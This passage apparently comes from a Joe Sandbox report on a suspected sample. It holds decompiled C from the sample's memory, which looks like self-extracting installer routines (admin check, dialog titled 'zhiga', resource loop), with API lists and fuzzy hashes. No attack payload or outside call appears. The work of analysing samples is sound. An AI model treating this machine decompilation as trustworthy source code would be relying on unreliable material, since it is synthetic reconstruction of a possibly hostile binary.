                                                                        				return E00F86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}



















                                                                        0x00f817f6
                                                                        0x00f817fd
                                                                        0x00f81805
                                                                        0x00f8180b
                                                                        0x00f8180d
                                                                        0x00f81815
                                                                        0x00f81818
                                                                        0x00f81820
                                                                        0x00f81824
                                                                        0x00f8182c
                                                                        0x00f81832
                                                                        0x00f81837
                                                                        0x00f81851
                                                                        0x00f81854
                                                                        0x00f8185d
                                                                        0x00f81862
                                                                        0x00f8186c
                                                                        0x00f81872
                                                                        0x00f81877
                                                                        0x00f8187e
                                                                        0x00f8187e
                                                                        0x00f81883
                                                                        0x00f81883
                                                                        0x00f8185d
                                                                        0x00f8188a
                                                                        0x00f8188a
                                                                        0x00f818a2

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                        • Instruction ID: b59704a69fe716f9aa49d14166eb9e7d063285a8d20c566dbf5e6ae3ee36b68e
                                                                        • Opcode Fuzzy Hash: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                        • Instruction Fuzzy Hash: 0A116A71E00209AFDB10AFA4DC4AAFEBB7CFF44711F10016AF905E6250DB719D059791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E00F843D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "zhiga");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xf89404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0xf891dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}








                                                                        0x00f83459
                                                                        0x00f8345c
                                                                        0x00f834d8
                                                                        0x00f834de
                                                                        0x00000000
                                                                        0x00f834e0
                                                                        0x00f8345e
                                                                        0x00f83463
                                                                        0x00f8349a
                                                                        0x00f834a0
                                                                        0x00f834a7
                                                                        0x00f834b2
                                                                        0x00f834c4
                                                                        0x00f834cb
                                                                        0x00000000
                                                                        0x00f834cb
                                                                        0x00f83468
                                                                        0x00f8346e
                                                                        0x00f83474
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8347c
                                                                        0x00f8348c
                                                                        0x00f83490
                                                                        0x00000000
                                                                        0x00f83496
                                                                        0x00f83484
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83486
                                                                        0x00000000
                                                                        0x00f83486
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F83490
                                                                        • GetDesktopWindow.USER32 ref: 00F8349A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F834B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00F834C4
                                                                        • SetForegroundWindow.USER32(?), ref: 00F834CB
                                                                        • EndDialog.USER32(?,00000002), ref: 00F834D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: zhiga
                                                                        • API String ID: 852535152-3705506974
                                                                        • Opcode ID: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                        • Instruction ID: 3a4c848608eb3baff4ff59ed4fddf151d20713878418aa0db3f8dd6fc642cad3
                                                                        • Opcode Fuzzy Hash: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                        • Instruction Fuzzy Hash: 9701B132644518ABEB16AF64DC0C9FD3A64EB05F20F104411F947865B0CB749F51FB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00F82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E00F865E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E00F86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}






















                                                                        0x00f82aac
                                                                        0x00f82ab7
                                                                        0x00f82abc
                                                                        0x00f82abe
                                                                        0x00f82ac3
                                                                        0x00f82ac6
                                                                        0x00f82ac9
                                                                        0x00f82ace
                                                                        0x00f82ae6
                                                                        0x00f82bdc
                                                                        0x00f82bdc
                                                                        0x00f82be0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82af2
                                                                        0x00f82afc
                                                                        0x00f82b00
                                                                        0x00f82b05
                                                                        0x00f82b05
                                                                        0x00f82b0b
                                                                        0x00f82bca
                                                                        0x00f82bd1
                                                                        0x00f82b11
                                                                        0x00f82b18
                                                                        0x00f82b26
                                                                        0x00f82b99
                                                                        0x00f82bc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82b9b
                                                                        0x00f82bae
                                                                        0x00f82bb3
                                                                        0x00f82bb5
                                                                        0x00f82bb5
                                                                        0x00f82bb8
                                                                        0x00f82bb8
                                                                        0x00f82bba
                                                                        0x00f82bbb
                                                                        0x00000000
                                                                        0x00f82bb8
                                                                        0x00f82b28
                                                                        0x00f82b2e
                                                                        0x00f82b33
                                                                        0x00f82b39
                                                                        0x00f82b3c
                                                                        0x00f82b3c
                                                                        0x00f82b3e
                                                                        0x00f82b3f
                                                                        0x00f82b55
                                                                        0x00f82b5d
                                                                        0x00f82b64
                                                                        0x00f82b64
                                                                        0x00f82b7a
                                                                        0x00f82b7f
                                                                        0x00f82b81
                                                                        0x00f82b81
                                                                        0x00f82b84
                                                                        0x00f82b84
                                                                        0x00f82b86
                                                                        0x00f82b87
                                                                        0x00f82bbf
                                                                        0x00f82bc1
                                                                        0x00f82bc1
                                                                        0x00f82b26
                                                                        0x00f82bda
                                                                        0x00f82bda
                                                                        0x00f82be6
                                                                        0x00f82be6
                                                                        0x00f82bf8

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F82AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00F82AF2
                                                                        • CharNextA.USER32(?), ref: 00F82B12
                                                                        • CharUpperA.USER32 ref: 00F82B1E
                                                                        • CharPrevA.USER32(?,?), ref: 00F82B55
                                                                        • CharNextA.USER32(?), ref: 00F82BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                        • Instruction ID: 9661ef238e8b256b6c7a8b87863ba2d7c40344dd726906a6f11e53b3f500099f
                                                                        • Opcode Fuzzy Hash: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                        • Instruction Fuzzy Hash: D6413A34A051495FEF55AF348C54AFD7BA9DF92310F14009AE8C287202DF399E46EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00F843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E00F86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}
























                                                                        0x00f843d0
                                                                        0x00f843d8
                                                                        0x00f843df
                                                                        0x00f843e6
                                                                        0x00f843ec
                                                                        0x00f843f1
                                                                        0x00f84400
                                                                        0x00f84403
                                                                        0x00f8440b
                                                                        0x00f84420
                                                                        0x00f84429
                                                                        0x00f84437
                                                                        0x00f84444
                                                                        0x00f84447
                                                                        0x00f8444d
                                                                        0x00f84454
                                                                        0x00f8445b
                                                                        0x00f84460
                                                                        0x00f84461
                                                                        0x00f84467
                                                                        0x00f8446f
                                                                        0x00f84473
                                                                        0x00f84473
                                                                        0x00f84463
                                                                        0x00f84463
                                                                        0x00f84463
                                                                        0x00f8447a
                                                                        0x00f84481
                                                                        0x00f84484
                                                                        0x00f8448a
                                                                        0x00f84492
                                                                        0x00f84496
                                                                        0x00f84496
                                                                        0x00f84486
                                                                        0x00f84486
                                                                        0x00f84486
                                                                        0x00f844b8

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00F843F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F8440B
                                                                        • GetDC.USER32(?), ref: 00F84423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F8442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F8443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F84447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00F844A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                        • Instruction ID: 5cdb442add0bc3976f4e91dee0f0fb7790f49e40224488fddb167cd6dc9ed3c0
                                                                        • Opcode Fuzzy Hash: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                        • Instruction Fuzzy Hash: 6A315A32E0051DAFDB14DFB8DD889EEBBB5EB89310F254169F805F3250DA30AC059B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00F86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E00F8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0xf89124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0xf8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E00F8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E00F86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}






















                                                                        0x00f86298
                                                                        0x00f862a0
                                                                        0x00f862a7
                                                                        0x00f862ad
                                                                        0x00f862af
                                                                        0x00f862bb
                                                                        0x00f862c3
                                                                        0x00f862c4
                                                                        0x00f8633b
                                                                        0x00f8633b
                                                                        0x00f86345
                                                                        0x00f8634d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f862da
                                                                        0x00f862de
                                                                        0x00f8635f
                                                                        0x00f86369
                                                                        0x00f862e0
                                                                        0x00f862e0
                                                                        0x00f862e0
                                                                        0x00f862e3
                                                                        0x00f862e5
                                                                        0x00f862e5
                                                                        0x00f862e8
                                                                        0x00f862e8
                                                                        0x00f862ea
                                                                        0x00f862eb
                                                                        0x00f862ef
                                                                        0x00f862f1
                                                                        0x00f862f3
                                                                        0x00f86302
                                                                        0x00f86308
                                                                        0x00f8630d
                                                                        0x00f86314
                                                                        0x00f86314
                                                                        0x00f86316
                                                                        0x00f86319
                                                                        0x00f86355
                                                                        0x00f86357
                                                                        0x00f8631b
                                                                        0x00f8631b
                                                                        0x00f86331
                                                                        0x00f86334
                                                                        0x00f86339
                                                                        0x00000000
                                                                        0x00f86339
                                                                        0x00f86319
                                                                        0x00f8636b
                                                                        0x00f8637d
                                                                        0x00f8637d
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F8631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F86345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F86357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                        • Instruction ID: 096558f961a4bfc61cf7c631631876f6364363db60d10102d41139e112eec9ba
                                                                        • Opcode Fuzzy Hash: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                        • Instruction Fuzzy Hash: C121F671A00219ABEB10AFA4DC499FE7B7CFB44710B00021AF902E3241DB359D02ABE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F8681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0xf881d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0xf881d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0xf881d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0xf81140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E00F866F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0xf881d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                        			}


















                                                                        0x00f8681f
                                                                        0x00f8682a
                                                                        0x00f86831
                                                                        0x00f86836
                                                                        0x00f8683c
                                                                        0x00f8683e
                                                                        0x00f86848
                                                                        0x00f86851
                                                                        0x00f8685d
                                                                        0x00f86864
                                                                        0x00f86876
                                                                        0x00f8693a
                                                                        0x00f8693a
                                                                        0x00f8687c
                                                                        0x00f8687e
                                                                        0x00f86885
                                                                        0x00000000
                                                                        0x00f868d6
                                                                        0x00f868f4
                                                                        0x00f86900
                                                                        0x00f86902
                                                                        0x00f8690a
                                                                        0x00000000
                                                                        0x00f8690c
                                                                        0x00f8690c
                                                                        0x00f8691c
                                                                        0x00000000
                                                                        0x00f8691e
                                                                        0x00f86924
                                                                        0x00f8692b
                                                                        0x00f86932
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8692b
                                                                        0x00f8691c
                                                                        0x00f8690a
                                                                        0x00f86885
                                                                        0x00f86876
                                                                        0x00f86951

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                        • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                          • Part of subcall function 00F866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00F8691A), ref: 00F86741
                                                                        Strings
                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00F868C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
